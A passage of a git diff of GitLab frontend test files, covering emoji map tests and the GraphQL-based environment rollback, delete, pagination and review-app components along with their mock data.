getEmojiInfo, sortEmoji } from '~/emoji'; +import { + glEmojiTag, + searchEmoji, + getEmojiInfo, + sortEmoji, + initEmojiMap, + getAllEmoji, +} from '~/emoji'; + import isEmojiUnicodeSupported, { isFlagEmoji, isRainbowFlagEmoji, @@ -9,7 +24,6 @@ import isEmojiUnicodeSupported, { isHorceRacingSkinToneComboEmoji, isPersonZwjEmoji, } from '~/emoji/support/is_emoji_unicode_supported'; -import { sanitize } from '~/lib/dompurify'; const emptySupportMap = { personZwj: false, @@ -31,14 +45,55 @@ const emptySupportMap = { }; describe('emoji', () => { - let mock; - beforeEach(async () => { - mock = await initEmojiMock(); + await initEmojiMock(); }); afterEach(() => { - mock.restore(); + clearEmojiMock(); + }); + + describe('initEmojiMap', () => { + it('should contain valid emoji', async () => { + await initEmojiMap(); + + const allEmoji = Object.keys(getAllEmoji()); + Object.keys(validEmoji).forEach((key) => { + expect(allEmoji.includes(key)).toBe(true); + }); + }); + + it('should not contain invalid emoji', async () => { + await initEmojiMap(); + + const allEmoji = Object.keys(getAllEmoji()); + Object.keys(invalidEmoji).forEach((key) => { + expect(allEmoji.includes(key)).toBe(false); + }); + }); + + it('fixes broken pride emoji', async () => { + clearEmojiMock(); + await initEmojiMock({ + gay_pride_flag: { + c: 'flags', + // Without a zero-width joiner + e: '🏳🌈', + name: 'gay_pride_flag', + u: '6.0', + }, + }); + + expect(getAllEmoji()).toEqual({ + gay_pride_flag: { + c: 'flags', + // With a zero-width joiner + e: '🏳️🌈', + name: 'gay_pride_flag', + u: '6.0', + }, + }); + }); }); describe('glEmojiTag', () => { @@ -378,32 +433,14 @@ describe('emoji', () => { }); describe('searchEmoji', () => { - const emojiFixture = Object.keys(mockEmojiData).reduce((acc, k) => { - const { name, e, u, d } = mockEmojiData[k]; - acc[k] = { name, e: sanitize(e), u, d }; - - return acc; - }, {}); - it.each([undefined, null, ''])("should return all emoji when the input is '%s'", (input) => { const search = searchEmoji(input); - const expected = [ - 'atom', - 'bomb', - 'construction_worker_tone5', - 'five', - 'grey_question', - 'black_heart', - 'heart', - 'custard', - 'star', - 'xss', - ].map((name) => { + const expected = Object.keys(validEmoji).map((name) => { return { - emoji: emojiFixture[name], + emoji: mockEmojiData[name], field: 'd', - fieldValue: emojiFixture[name].d, + fieldValue: mockEmojiData[name].d, score: 0, }; }); @@ -453,7 +490,7 @@ describe('emoji', () => { const { field, score, fieldValue, name } = item; return { - emoji: emojiFixture[name], + emoji: mockEmojiData[name], field, fieldValue, score, @@ -564,9 +601,9 @@ describe('emoji', () => { const { field, score, name } = item; return { - emoji: emojiFixture[name], + emoji: mockEmojiData[name], field, - fieldValue: emojiFixture[name][field], + fieldValue: mockEmojiData[name][field], score, }; }); @@ -622,13 +659,4 @@ describe('emoji', () => { expect(sortEmoji(scoredItems)).toEqual(expected); }); }); - - describe('sanitize emojis', () => { - it('should return sanitized emoji', () => { - expect(getEmojiInfo('xss')).toEqual({ - ...mockEmojiData.xss, - e: '<img src="x">', - }); - }); - }); }); diff --git a/spec/frontend/environments/confirm_rollback_modal_spec.js b/spec/frontend/environments/confirm_rollback_modal_spec.js index d62aaec4f69..b699f953945 100644 --- a/spec/frontend/environments/confirm_rollback_modal_spec.js +++ b/spec/frontend/environments/confirm_rollback_modal_spec.js @@ -1,6 +1,9 @@ import { GlModal, GlSprintf } from '@gitlab/ui'; import { shallowMount } from '@vue/test-utils'; +import Vue, { nextTick } from 'vue'; +import VueApollo from 'vue-apollo'; import ConfirmRollbackModal from '~/environments/components/confirm_rollback_modal.vue'; +import createMockApollo from 'helpers/mock_apollo_helper'; import eventHub from '~/environments/event_hub'; describe('Confirm Rollback Modal Component', () => { @@ -17,6 +20,17 @@ describe('Confirm Rollback Modal Component', () => { modalId: 'test', }; + const envWithLastDeploymentGraphql = { + name: 'test', + lastDeployment: { + commit: { + shortId: 'abc0123', + }, + 'last?': true, + }, + modalId: 'test', + }; + const envWithoutLastDeployment = { name: 'test', modalId: 'test', @@ -26,7 +40,7 @@ describe('Confirm Rollback Modal Component', () => { const retryPath = 'test/-/jobs/123/retry'; - const createComponent = (props = {}) => { + const createComponent = (props = {}, options = {}) => { component = shallowMount(ConfirmRollbackModal, { propsData: { ...props, @@ -34,6 +48,7 @@ describe('Confirm Rollback Modal Component', () => { stubs: { GlSprintf, }, + ...options, }); }; @@ -101,4 +116,121 @@ describe('Confirm Rollback Modal Component', () => { }); }, ); + + describe('graphql', () => { + describe.each` + hasMultipleCommits | environmentData | retryUrl | primaryPropsAttrs + ${true} | ${envWithLastDeploymentGraphql} | ${null} | ${[{ variant: 'danger' }]} + ${false} | ${envWithoutLastDeployment} | ${retryPath} | ${[{ variant: 'danger' }, { 'data-method': 'post' }, { href: retryPath }]} + `( + 'when hasMultipleCommits=$hasMultipleCommits', + ({ hasMultipleCommits, environmentData, retryUrl, primaryPropsAttrs }) => { + Vue.use(VueApollo); + + let apolloProvider; + let rollbackResolver; + + beforeEach(() => { + rollbackResolver = jest.fn(); + apolloProvider = createMockApollo([], { + Mutation: { rollbackEnvironment: rollbackResolver }, + }); + environment = environmentData; + }); + + it('should set contain the commit hash and ask for confirmation', () => { + createComponent( + { + environment: { + ...environment, + lastDeployment: { + ...environment.lastDeployment, + 'last?': false, + }, + }, + hasMultipleCommits, + retryUrl, + graphql: true, + }, + { apolloProvider }, + ); + const modal = component.find(GlModal); + + expect(modal.text()).toContain('commit abc0123'); + expect(modal.text()).toContain('Are you sure you want to continue?'); + }); + + it('should show "Rollback" when isLastDeployment is false', () => { + createComponent( + { + environment: { + ...environment, + lastDeployment: { + ...environment.lastDeployment, + 'last?': false, + }, + }, + hasMultipleCommits, + retryUrl, + graphql: true, + }, + { apolloProvider }, + ); + const modal = component.find(GlModal); + + expect(modal.attributes('title')).toContain('Rollback'); + expect(modal.attributes('title')).toContain('test'); + expect(modal.props('actionPrimary').text).toBe('Rollback'); + expect(modal.props('actionPrimary').attributes).toEqual(primaryPropsAttrs); + }); + + it('should show "Re-deploy" when isLastDeployment is true', () => { + createComponent( + { + environment: { + ...environment, + lastDeployment: { + ...environment.lastDeployment, + 'last?': true, + }, + }, + hasMultipleCommits, + graphql: true, + }, + { apolloProvider }, + ); + + const modal = component.find(GlModal); + + expect(modal.attributes('title')).toContain('Re-deploy'); + expect(modal.attributes('title')).toContain('test'); + expect(modal.props('actionPrimary').text).toBe('Re-deploy'); + }); + + it('should commit the "rollback" mutation when "ok" is clicked', async () => { + const env = { ...environmentData, isLastDeployment: true }; + + createComponent( + { + environment: env, + hasMultipleCommits, + graphql: true, + }, + { apolloProvider }, + ); + + const modal = component.find(GlModal); + modal.vm.$emit('ok'); + + await nextTick(); + expect(rollbackResolver).toHaveBeenCalledWith( + expect.anything(), + { environment: env }, + expect.anything(), + expect.anything(), + ); + }); + }, + ); + }); }); diff --git a/spec/frontend/environments/delete_environment_modal_spec.js b/spec/frontend/environments/delete_environment_modal_spec.js new file mode 100644 index 00000000000..50c4ca00009 --- /dev/null +++ b/spec/frontend/environments/delete_environment_modal_spec.js @@ -0,0 +1,64 @@ +import { GlModal } from '@gitlab/ui'; +import { shallowMount } from '@vue/test-utils'; +import Vue, { nextTick } from 'vue'; +import VueApollo from 'vue-apollo'; +import { s__, sprintf } from '~/locale'; +import DeleteEnvironmentModal from '~/environments/components/delete_environment_modal.vue'; +import createMockApollo from 'helpers/mock_apollo_helper'; +import { resolvedEnvironment } from './graphql/mock_data'; + +Vue.use(VueApollo); + +describe('~/environments/components/delete_environment_modal.vue', () => { + let mockApollo; + let deleteResolver; + let wrapper; + + const createComponent = ({ props = {}, apolloProvider } = {}) => { + wrapper = shallowMount(DeleteEnvironmentModal, { + propsData: { + graphql: true, + environment: resolvedEnvironment, + ...props, + }, + apolloProvider, + }); + }; + + beforeEach(() => { + deleteResolver = jest.fn(); + mockApollo = createMockApollo([], { + Mutation: { deleteEnvironment: deleteResolver }, + }); + }); + + it('should confirm the environment to delete', () => { + createComponent({ apolloProvider: mockApollo }); + + expect(wrapper.text()).toBe( + sprintf( + s__( + `Environments|Deleting the '%{environmentName}' environment cannot be undone. Do you want to delete it anyway?`, + ), + { + environmentName: resolvedEnvironment.name, + }, + ), + ); + }); + + it('should send the delete mutation on primary', async () => { + createComponent({ apolloProvider: mockApollo }); + + wrapper.findComponent(GlModal).vm.$emit('primary'); + + await nextTick(); + + expect(deleteResolver).toHaveBeenCalledWith( + expect.anything(), + { environment: resolvedEnvironment }, + expect.anything(), + expect.anything(), + ); + }); +}); diff --git a/spec/frontend/environments/enable_review_app_modal_spec.js b/spec/frontend/environments/enable_review_app_modal_spec.js index 9a3f13f19d5..17ae10a2884 100644 --- a/spec/frontend/environments/enable_review_app_modal_spec.js +++ b/spec/frontend/environments/enable_review_app_modal_spec.js @@ -1,10 +1,12 @@ import { shallowMount } from '@vue/test-utils'; +import { GlModal } from '@gitlab/ui'; import { extendedWrapper } from 'helpers/vue_test_utils_helper'; import EnableReviewAppButton from '~/environments/components/enable_review_app_modal.vue'; import ModalCopyButton from '~/vue_shared/components/modal_copy_button.vue'; describe('Enable Review App Button', () => { let wrapper; + let modal; afterEach(() => { wrapper.destroy(); @@ -16,12 +18,15 @@ describe('Enable Review App Button', () => { shallowMount(EnableReviewAppButton, { propsData: { modalId: 'fake-id', + visible: true, }, provide: { defaultBranchName: 'main', }, }), ); + + modal = wrapper.findComponent(GlModal); }); it('renders the defaultBranchName copy', () => { @@ -32,5 +37,15 @@ describe('Enable Review App Button', () => { it('renders the copyToClipboard button', () => { expect(wrapper.findComponent(ModalCopyButton).exists()).toBe(true); }); + + it('emits change events from the modal up', () => { + modal.vm.$emit('change', false); + + expect(wrapper.emitted('change')).toEqual([[false]]); + }); + + it('passes visible to the modal', () => { + expect(modal.props('visible')).toBe(true); + }); }); }); diff --git a/spec/frontend/environments/environment_delete_spec.js b/spec/frontend/environments/environment_delete_spec.js index 2d8cff0c74a..057cb9858c4 100644 --- a/spec/frontend/environments/environment_delete_spec.js +++ b/spec/frontend/environments/environment_delete_spec.js @@ -1,37 +1,71 @@ import { GlDropdownItem } from '@gitlab/ui'; - import { shallowMount } from '@vue/test-utils'; +import Vue from 'vue'; +import VueApollo from 'vue-apollo'; +import setEnvironmentToDelete from '~/environments/graphql/mutations/set_environment_to_delete.mutation.graphql'; import DeleteComponent from '~/environments/components/environment_delete.vue'; import eventHub from '~/environments/event_hub'; +import createMockApollo from 'helpers/mock_apollo_helper'; +import { resolvedEnvironment } from './graphql/mock_data'; describe('External URL Component', () => { let wrapper; - const createWrapper = () => { + const createWrapper = (props = {}, options = {}) => { wrapper = shallowMount(DeleteComponent, { + ...options, propsData: { - environment: {}, + environment: resolvedEnvironment, + ...props, }, }); }; const findDropdownItem = () => wrapper.find(GlDropdownItem); - beforeEach(() => { - jest.spyOn(window, 'confirm'); + describe('event hub', () => { + beforeEach(() => { + createWrapper(); + }); - createWrapper(); - }); + it('should render a dropdown item to delete the environment', () => { + expect(findDropdownItem().exists()).toBe(true); + expect(wrapper.text()).toEqual('Delete environment'); + expect(findDropdownItem().attributes('variant')).toBe('danger'); + }); - it('should render a dropdown item to delete the environment', () => { - expect(findDropdownItem().exists()).toBe(true); - expect(wrapper.text()).toEqual('Delete environment'); - expect(findDropdownItem().attributes('variant')).toBe('danger'); + it('emits requestDeleteEnvironment in the event hub when button is clicked', () => { + jest.spyOn(eventHub, '$emit'); + findDropdownItem().vm.$emit('click'); + expect(eventHub.$emit).toHaveBeenCalledWith('requestDeleteEnvironment', resolvedEnvironment); + }); }); - it('emits requestDeleteEnvironment in the event hub when button is clicked', () => { - jest.spyOn(eventHub, '$emit'); - findDropdownItem().vm.$emit('click'); - expect(eventHub.$emit).toHaveBeenCalledWith('requestDeleteEnvironment', wrapper.vm.environment); + describe('graphql', () => { + Vue.use(VueApollo); + let mockApollo; + + beforeEach(() => { + mockApollo = createMockApollo(); + createWrapper( + { graphql: true, environment: resolvedEnvironment }, + { apolloProvider: mockApollo }, + ); + }); + + it('should render a dropdown item to delete the environment', () => { + expect(findDropdownItem().exists()).toBe(true); + expect(wrapper.text()).toEqual('Delete environment'); + expect(findDropdownItem().attributes('variant')).toBe('danger'); + }); + + it('emits requestDeleteEnvironment in the event hub when button is clicked', () => { + jest.spyOn(mockApollo.defaultClient, 'mutate'); + findDropdownItem().vm.$emit('click'); + expect(mockApollo.defaultClient.mutate).toHaveBeenCalledWith({ + mutation: setEnvironmentToDelete, + variables: { environment: resolvedEnvironment }, + }); + }); }); }); diff --git a/spec/frontend/environments/environment_rollback_spec.js b/spec/frontend/environments/environment_rollback_spec.js index cde675cd9e7..7eff46baaf7 100644 --- a/spec/frontend/environments/environment_rollback_spec.js +++ b/spec/frontend/environments/environment_rollback_spec.js @@ -1,7 +1,11 @@ +import Vue from 'vue'; +import VueApollo from 'vue-apollo'; import { GlDropdownItem } from '@gitlab/ui'; import { shallowMount } from '@vue/test-utils'; import RollbackComponent from '~/environments/components/environment_rollback.vue'; import eventHub from '~/environments/event_hub'; +import setEnvironmentToRollback from '~/environments/graphql/mutations/set_environment_to_rollback.mutation.graphql'; +import createMockApollo from 'helpers/mock_apollo_helper'; describe('Rollback Component', () => { const retryUrl = 'https://gitlab.com/retry'; @@ -50,4 +54,29 @@ describe('Rollback Component', () => { name: 'test', }); }); + + it('should trigger a graphql mutation when graphql is enabled', () => { + Vue.use(VueApollo); + + const apolloProvider = createMockApollo(); + jest.spyOn(apolloProvider.defaultClient, 'mutate'); + const environment = { + name: 'test', + }; + const wrapper = shallowMount(RollbackComponent, { + propsData: { + retryUrl, + graphql: true, + environment, + }, + apolloProvider, + }); + const button = wrapper.find(GlDropdownItem); + button.vm.$emit('click'); + + expect(apolloProvider.defaultClient.mutate).toHaveBeenCalledWith({ + mutation: setEnvironmentToRollback, + variables: { environment }, + }); + }); }); diff --git a/spec/frontend/environments/graphql/mock_data.js b/spec/frontend/environments/graphql/mock_data.js index e56b6448b7d..e75d3ac0321 100644 --- a/spec/frontend/environments/graphql/mock_data.js +++ b/spec/frontend/environments/graphql/mock_data.js @@ -469,6 +469,33 @@ export const folder = { stopped_count: 0, }; +export const resolvedEnvironment = { + id: 41, + globalId: 'gid://gitlab/Environment/41', + name: 'review/hello', + state: 'available', + externalUrl: 'https://example.org', + environmentType: 'review', + nameWithoutType: 'hello', + lastDeployment: null, + hasStopAction: false, + rolloutStatus: null, + environmentPath: '/h5bp/html5-boilerplate/-/environments/41', + stopPath: '/h5bp/html5-boilerplate/-/environments/41/stop', + cancelAutoStopPath: '/h5bp/html5-boilerplate/-/environments/41/cancel_auto_stop', + deletePath: '/api/v4/projects/8/environments/41', + folderPath: '/h5bp/html5-boilerplate/-/environments/folders/review', + createdAt: '2021-10-04T19:27:00.527Z', + updatedAt: '2021-10-04T19:27:00.527Z', + canStop: true, + logsPath: '/h5bp/html5-boilerplate/-/logs?environment_name=review%2Fhello', + logsApiPath: '/h5bp/html5-boilerplate/-/logs/k8s.json?environment_name=review%2Fhello', + enableAdvancedLogsQuerying: false, + canDelete: false, + hasOpenedAlert: false, + __typename: 'LocalEnvironment', +}; + export const resolvedFolder = { availableCount: 2, environments: [ diff --git a/spec/frontend/environments/graphql/resolvers_spec.js b/spec/frontend/environments/graphql/resolvers_spec.js index 4d2a0818996..d8d26b74504 100644 --- a/spec/frontend/environments/graphql/resolvers_spec.js +++ b/spec/frontend/environments/graphql/resolvers_spec.js @@ -1,18 +1,33 @@ import MockAdapter from 'axios-mock-adapter'; import axios from '~/lib/utils/axios_utils'; import { resolvers } from '~/environments/graphql/resolvers'; +import environmentToRollback from '~/environments/graphql/queries/environment_to_rollback.query.graphql'; +import environmentToDelete from '~/environments/graphql/queries/environment_to_delete.query.graphql'; +import createMockApollo from 'helpers/mock_apollo_helper'; +import pollIntervalQuery from '~/environments/graphql/queries/poll_interval.query.graphql'; +import pageInfoQuery from '~/environments/graphql/queries/page_info.query.graphql'; import { TEST_HOST } from 'helpers/test_constants'; -import { environmentsApp, resolvedEnvironmentsApp, folder, resolvedFolder } from './mock_data'; +import { + environmentsApp, + resolvedEnvironmentsApp, + resolvedEnvironment, + folder, + resolvedFolder, +} from './mock_data'; const ENDPOINT = `${TEST_HOST}/environments`; describe('~/frontend/environments/graphql/resolvers', () => { let mockResolvers; let mock; + let mockApollo; + let localState; beforeEach(() => { mockResolvers = resolvers(ENDPOINT); mock = new MockAdapter(axios); + mockApollo = createMockApollo(); + localState = mockApollo.defaultClient.localState; }); afterEach(() => { @@ -21,10 +36,87 @@ describe('~/frontend/environments/graphql/resolvers', () => { describe('environmentApp', () => { it('should fetch environments and map them to frontend data', async () => { - mock.onGet(ENDPOINT, { params: { nested: true } }).reply(200, environmentsApp); + const cache = { writeQuery: jest.fn() }; + const scope = 'available'; + mock + .onGet(ENDPOINT, { params: { nested: true, scope, page: 1 } }) + .reply(200, environmentsApp, {}); - const app = await mockResolvers.Query.environmentApp(); + const app = await mockResolvers.Query.environmentApp(null, { scope, page: 1 }, { cache }); expect(app).toEqual(resolvedEnvironmentsApp); + expect(cache.writeQuery).toHaveBeenCalledWith({ + query: pollIntervalQuery, + data: { interval: undefined }, + }); + }); + it('should set the poll interval when there is one', async () => { + const cache = { writeQuery: jest.fn() }; + const scope = 'stopped'; + const interval = 3000; + mock + .onGet(ENDPOINT, { params: { nested: true, scope, page: 1 } }) + .reply(200, environmentsApp, { + 'poll-interval': interval, + }); + + await mockResolvers.Query.environmentApp(null, { scope, page: 1 }, { cache }); + expect(cache.writeQuery).toHaveBeenCalledWith({ + query: pollIntervalQuery, + data: { interval }, + }); + }); + it('should set page info if there is any', async () => { + const cache = { writeQuery: jest.fn() }; + const scope = 'stopped'; + mock + .onGet(ENDPOINT, { params: { nested: true, scope, page: 1 } }) + .reply(200, environmentsApp, { + 'x-next-page': '2', + 'x-page': '1', + 'X-Per-Page': '2', + 'X-Prev-Page': '', + 'X-TOTAL': '37', + 'X-Total-Pages': '5', + }); + + await mockResolvers.Query.environmentApp(null, { scope, page: 1 }, { cache }); + expect(cache.writeQuery).toHaveBeenCalledWith({ + query: pageInfoQuery, + data: { + pageInfo: { + total: 37, + perPage: 2, + previousPage: NaN, + totalPages: 5, + nextPage: 2, + page: 1, + __typename: 'LocalPageInfo', + }, + }, + }); + }); + it('should not set page info if there is none', async () => { + const cache = { writeQuery: jest.fn() }; + const scope = 'stopped'; + mock + .onGet(ENDPOINT, { params: { nested: true, scope, page: 1 } }) + .reply(200, environmentsApp, {}); + + await mockResolvers.Query.environmentApp(null, { scope, page: 1 }, { cache }); + expect(cache.writeQuery).toHaveBeenCalledWith({ + query: pageInfoQuery, + data: { + pageInfo: { + __typename: 'LocalPageInfo', + nextPage: NaN, + page: NaN, + perPage: NaN, + previousPage: NaN, + total: NaN, + totalPages: NaN, + }, + }, + }); }); }); describe('folder', () => { @@ -42,7 +134,7 @@ describe('~/frontend/environments/graphql/resolvers', () => { it('should post to the stop environment path', async () => { mock.onPost(ENDPOINT).reply(200); - await mockResolvers.Mutations.stopEnvironment(null, { environment: { stopPath: ENDPOINT } }); + await mockResolvers.Mutation.stopEnvironment(null, { environment: { stopPath: ENDPOINT } }); expect(mock.history.post).toContainEqual( expect.objectContaining({ url: ENDPOINT, method: 'post' }), @@ -53,7 +145,7 @@ describe('~/frontend/environments/graphql/resolvers', () => { it('should post to the retry environment path', async () => { mock.onPost(ENDPOINT).reply(200); - await mockResolvers.Mutations.rollbackEnvironment(null, { + await mockResolvers.Mutation.rollbackEnvironment(null, { environment: { retryUrl: ENDPOINT }, }); @@ -66,7 +158,7 @@ describe('~/frontend/environments/graphql/resolvers', () => { it('should DELETE to the delete environment path', async () => { mock.onDelete(ENDPOINT).reply(200); - await mockResolvers.Mutations.deleteEnvironment(null, { + await mockResolvers.Mutation.deleteEnvironment(null, { environment: { deletePath: ENDPOINT }, }); @@ -79,7 +171,7 @@ describe('~/frontend/environments/graphql/resolvers', () => { it('should post to the auto stop path', async () => { mock.onPost(ENDPOINT).reply(200); - await mockResolvers.Mutations.cancelAutoStop(null, { + await mockResolvers.Mutation.cancelAutoStop(null, { environment: { autoStopPath: ENDPOINT }, }); @@ -88,4 +180,34 @@ describe('~/frontend/environments/graphql/resolvers', () => { ); }); }); + describe('setEnvironmentToRollback', () => { + it('should write the given environment to the cache', () => { + localState.client.writeQuery = jest.fn(); + mockResolvers.Mutation.setEnvironmentToRollback( + null, + { environment: resolvedEnvironment }, + localState, + ); + + expect(localState.client.writeQuery).toHaveBeenCalledWith({ + query: environmentToRollback, + data: { environmentToRollback: resolvedEnvironment }, + }); + }); + }); + describe('setEnvironmentToDelete', () => { + it('should write the given environment to the cache', () => { + localState.client.writeQuery = jest.fn(); + mockResolvers.Mutation.setEnvironmentToDelete( + null, + { environment: resolvedEnvironment }, + localState, + ); + + expect(localState.client.writeQuery).toHaveBeenCalledWith({ + query: environmentToDelete, + data: { environmentToDelete: resolvedEnvironment }, + }); + }); + }); }); diff --git a/spec/frontend/environments/new_environment_folder_spec.js b/spec/frontend/environments/new_environment_folder_spec.js index 5696e187a86..27d27d5869a 100644 --- a/spec/frontend/environments/new_environment_folder_spec.js +++ b/spec/frontend/environments/new_environment_folder_spec.js @@ -3,8 +3,8 @@ import Vue from 'vue'; import { GlCollapse, GlIcon } from '@gitlab/ui'; import createMockApollo from 'helpers/mock_apollo_helper'; import { mountExtended } from 'helpers/vue_test_utils_helper'; +import { __, s__ } from '~/locale'; import EnvironmentsFolder from '~/environments/components/new_environment_folder.vue'; -import { s__ } from '~/locale'; import { resolvedEnvironmentsApp, resolvedFolder } from './graphql/mock_data'; Vue.use(VueApollo); @@ -14,6 +14,7 @@ describe('~/environments/components/new_environments_folder.vue', () => { let environmentFolderMock; let nestedEnvironment; let folderName; + let button; const findLink = () => wrapper.findByRole('link', { name: s__('Environments|Show all') }); @@ -32,6 +33,7 @@ describe('~/environments/components/new_environments_folder.vue', () => { environmentFolderMock.mockReturnValue(resolvedFolder); wrapper = createWrapper({ nestedEnvironment }, createApolloProvider()); folderName = wrapper.findByText(nestedEnvironment.name); + button = wrapper.findByRole('button', { name: __('Expand') }); }); afterEach(() => { @@ -61,10 +63,11 @@ describe('~/environments/components/new_environments_folder.vue', () => { }); it('opens on click', async () => { - await folderName.trigger('click'); + await button.trigger('click'); const link = findLink(); + expect(button.attributes('aria-label')).toBe(__('Collapse')); expect(collapse.attributes('visible')).toBe('true'); expect(icons.wrappers.map((i) => i.props('name'))).toEqual(['angle-down', 'folder-open']); expect(folderName.classes('gl-font-weight-bold')).toBe(true); diff --git a/spec/frontend/environments/new_environments_app_spec.js b/spec/frontend/environments/new_environments_app_spec.js index 0ad8e8f442c..1e9bd4d64c9 100644 --- a/spec/frontend/environments/new_environments_app_spec.js +++ b/spec/frontend/environments/new_environments_app_spec.js @@ -1,8 +1,11 @@ -import Vue from 'vue'; +import Vue, { nextTick } from 'vue'; import VueApollo from 'vue-apollo'; -import { mount } from '@vue/test-utils'; +import { GlPagination } from '@gitlab/ui'; +import { mountExtended } from 'helpers/vue_test_utils_helper'; import createMockApollo from 'helpers/mock_apollo_helper'; import waitForPromises from 'helpers/wait_for_promises'; +import setWindowLocation from 'helpers/set_window_location_helper'; +import { sprintf, __, s__ } from '~/locale'; import EnvironmentsApp from '~/environments/components/new_environments_app.vue'; import EnvironmentsFolder from '~/environments/components/new_environment_folder.vue'; import { resolvedEnvironmentsApp, resolvedFolder } from './graphql/mock_data'; @@ -13,20 +16,59 @@ describe('~/environments/components/new_environments_app.vue', () => { let wrapper; let environmentAppMock; let environmentFolderMock; + let paginationMock; const createApolloProvider = () => { const mockResolvers = { - Query: { environmentApp: environmentAppMock, folder: environmentFolderMock }, + Query: { + environmentApp: environmentAppMock, + folder: environmentFolderMock, + pageInfo: paginationMock, + }, }; return createMockApollo([], mockResolvers); }; - const createWrapper = (apolloProvider) => mount(EnvironmentsApp, { apolloProvider }); + const createWrapper = ({ provide = {}, apolloProvider } = {}) => + mountExtended(EnvironmentsApp, { + provide: { + newEnvironmentPath: '/environments/new', + canCreateEnvironment: true, + defaultBranchName: 'main', + ...provide, + }, + apolloProvider, + }); + + const createWrapperWithMocked = async ({ + provide = {}, + environmentsApp, + folder, + pageInfo = { + total: 20, + perPage: 5, + nextPage: 3, + page: 2, + previousPage: 1, + __typename: 'LocalPageInfo', + }, + }) => { + setWindowLocation('?scope=available&page=2'); + environmentAppMock.mockReturnValue(environmentsApp); + environmentFolderMock.mockReturnValue(folder); + paginationMock.mockReturnValue(pageInfo); + const apolloProvider = createApolloProvider(); + wrapper = createWrapper({ apolloProvider, provide }); + + await waitForPromises(); + await nextTick(); + }; beforeEach(() => { environmentAppMock = jest.fn(); environmentFolderMock = jest.fn(); + paginationMock = jest.fn(); }); afterEach(() => { @@ -34,17 +76,196 @@ describe('~/environments/components/new_environments_app.vue', () => { }); it('should show all the folders that are fetched', async () => { - environmentAppMock.mockReturnValue(resolvedEnvironmentsApp); - environmentFolderMock.mockReturnValue(resolvedFolder); - const apolloProvider = createApolloProvider(); - wrapper = createWrapper(apolloProvider); - - await waitForPromises(); - await Vue.nextTick(); + await createWrapperWithMocked({ + environmentsApp: resolvedEnvironmentsApp, + folder: resolvedFolder, + }); const text = wrapper.findAllComponents(EnvironmentsFolder).wrappers.map((w) => w.text()); expect(text).toContainEqual(expect.stringMatching('review')); expect(text).not.toContainEqual(expect.stringMatching('production')); }); + + it('should show a button to create a new environment', async () => { + await createWrapperWithMocked({ + environmentsApp: resolvedEnvironmentsApp, + folder: resolvedFolder, + }); + + const button = wrapper.findByRole('link', { name: s__('Environments|New environment') }); + expect(button.attributes('href')).toBe('/environments/new'); + }); + + it('should not show a button to create a new environment if the user has no permissions', async () => { + await createWrapperWithMocked({ + environmentsApp: resolvedEnvironmentsApp, + folder: resolvedFolder, + provide: { canCreateEnvironment: false, newEnvironmentPath: '' }, + }); + + const button = wrapper.findByRole('link', { name: s__('Environments|New environment') }); + expect(button.exists()).toBe(false); + }); + + it('should show a button to open the review app modal', async () => { + await createWrapperWithMocked({ + environmentsApp: resolvedEnvironmentsApp, + folder: resolvedFolder, + }); + + const button = wrapper.findByRole('button', { name: s__('Environments|Enable review app') }); + button.trigger('click'); + + await nextTick(); + + expect(wrapper.findByText(s__('ReviewApp|Enable Review App')).exists()).toBe(true); + }); + + it('should not show a button to open the review app modal if review apps are configured', async () => { + await createWrapperWithMocked({ + environmentsApp: { + ...resolvedEnvironmentsApp, + reviewApp: { canSetupReviewApp: false }, + }, + folder: resolvedFolder, + }); + await waitForPromises(); + await nextTick(); + + const button = wrapper.findByRole('button', { name: s__('Environments|Enable review app') }); + expect(button.exists()).toBe(false); + }); + + describe('tabs', () => { + it('should show tabs for available and stopped environmets', async () => { + await createWrapperWithMocked({ + environmentsApp: resolvedEnvironmentsApp, + folder: resolvedFolder, + }); + + const [available, stopped] = wrapper.findAllByRole('tab').wrappers; + + expect(available.text()).toContain(__('Available')); + expect(available.text()).toContain(resolvedEnvironmentsApp.availableCount); + expect(stopped.text()).toContain(__('Stopped')); + expect(stopped.text()).toContain(resolvedEnvironmentsApp.stoppedCount); + }); + + it('should change the requested scope on tab change', async () => { + await createWrapperWithMocked({ + environmentsApp: resolvedEnvironmentsApp, + folder: resolvedFolder, + }); + const stopped = wrapper.findByRole('tab', { + name: `${__('Stopped')} ${resolvedEnvironmentsApp.stoppedCount}`, + }); + + stopped.trigger('click'); + + await nextTick(); + await waitForPromises(); + + expect(environmentAppMock).toHaveBeenCalledWith( + expect.anything(), + expect.objectContaining({ scope: 'stopped' }), + expect.anything(), + expect.anything(), + ); + }); + }); + + describe('pagination', () => { + it('should sync page from query params on load', async () => { + await createWrapperWithMocked({ + environmentsApp: resolvedEnvironmentsApp, + folder: resolvedFolder, + }); + + expect(wrapper.findComponent(GlPagination).props('value')).toBe(2); + }); + + it('should change the requested page on next page click', async () => { + await createWrapperWithMocked({ + environmentsApp: resolvedEnvironmentsApp, + folder: resolvedFolder, + }); + const next = wrapper.findByRole('link', { + name: __('Go to next page'), + }); + + next.trigger('click'); + + await nextTick(); + await waitForPromises(); + + expect(environmentAppMock).toHaveBeenCalledWith( + expect.anything(), + expect.objectContaining({ page: 3 }), + expect.anything(), + expect.anything(), + ); + }); + + it('should change the requested page on previous page click', async () => { + await createWrapperWithMocked({ + environmentsApp: resolvedEnvironmentsApp, + folder: resolvedFolder, + }); + const prev = wrapper.findByRole('link', { + name: __('Go to previous page'), + }); + + prev.trigger('click'); + + await nextTick(); + await waitForPromises(); + + expect(environmentAppMock).toHaveBeenCalledWith( + expect.anything(), + expect.objectContaining({ page: 1 }), + expect.anything(), + expect.anything(), + ); + }); + + it('should change the requested page on specific page click', async () => { + await createWrapperWithMocked({ + environmentsApp: resolvedEnvironmentsApp, + folder: resolvedFolder, + }); + + const page = 1; + const pageButton = wrapper.findByRole('link', { + name: sprintf(__('Go to page %{page}'), { page }), + }); + + pageButton.trigger('click'); + + await nextTick(); + await waitForPromises(); + + expect(environmentAppMock).toHaveBeenCalledWith( + expect.anything(), + expect.objectContaining({ page }), + expect.anything(), + expect.anything(), + ); + }); + + it('should sync the query params to the new page', async () => { + await createWrapperWithMocked({ + environmentsApp: resolvedEnvironmentsApp, + folder: resolvedFolder, + }); + const next = wrapper.findByRole('link', { + name: __('Go to next page'), + }); + + next.trigger('click'); + + await nextTick(); + expect(window.location.search).toBe('?scope=available&page=3'); + }); + }); }); diff --git a/spec/frontend/experimentation/utils_spec.js b/spec/frontend/experimentation/utils_spec.js index 923795ca3f3..0d663fd055e 100644 --- a/spec/frontend/experimentation/utils_spec.js +++ b/spec/frontend/experimentation/utils_spec.js @@ -51,6 +51,29 @@ 